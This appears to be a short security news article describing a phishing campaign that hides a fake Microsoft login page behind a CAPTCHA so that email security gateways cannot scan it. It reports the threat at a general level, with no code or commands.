How CAPTCHA is being used to bypass anti malware security scans and firewalls

The Completely Automated Public Turing test to tell Computers and Humans Apart, most commonly known as CAPTCHA, is a system for creating challenges that must be completed before users can advance on a website. According to IT system audit specialists, the main function of a CAPTCHA challenge is to prevent hackers from using automated bots to access certain content because, in theory, only a human being can solve one of these challenges.

This does not mean that a CAPTCHA is exempt
from any security issue. A report from the security company Cofense reports on
a new phishing campaign that, using CAPTCHA boxes, hides a fake Microsoft
login page.

According to IT system audit experts, operators
of this malicious campaign use CAPTCHA to prevent anti-malware analysis on a
system from being performed correctly, so it will not be possible to check if a
web page was made to extract visitors’ credentials.

Many companies use Secure Email Gateways (SEG)
to scan their incoming emails for malware or indications of other attack
variants. The point is that SEG is not sophisticated enough to solve a CAPTCHA
and, as this is not a known attack variant, SEG vendors do not have adequate

“SEGs cannot scan the malicious page, only
the CAPTCHA code site, which does not contain malicious elements, so the SEG
tags it as secure content and allows the user to advance,” the IT system
audit experts mention. When the recipient of the email resolves the CAPTCHA
challenge, they receive a fake Microsoft login page that will record the login
credentials to their company accounts.

Specialists detected that the email address
from which the phishing link is sent is an email account that has
been hijacked by campaign operators. The message is intended to be a
notification about a voice mail message; both the phishing page and the CAPTCHA
used by the attackers are hosted on Microsoft cloud servers.

These kinds of attacks make it difficult for
people or automatic scanners to detect that a page is not legitimate. SEG
technology typically focuses on the reputation of the domain from which an
email is sent; in this case, because the malware is hosted on a Microsoft cloud
server, it is easy for attackers to bypass this protective measure.

Experts in IT system audit from the
International Institute of Cyber Security (IICS) say they are concerned about
the ability of threat actors to reverse techniques normally used against them
to take advantage over their victims. In this case they have taken advantage of
the use of CAPTCHA, but they have also been shown to be able to exploit HTTPS
encryption, cryptographic signatures and other protective measures to interrupt
anti-malware analysis.

To Top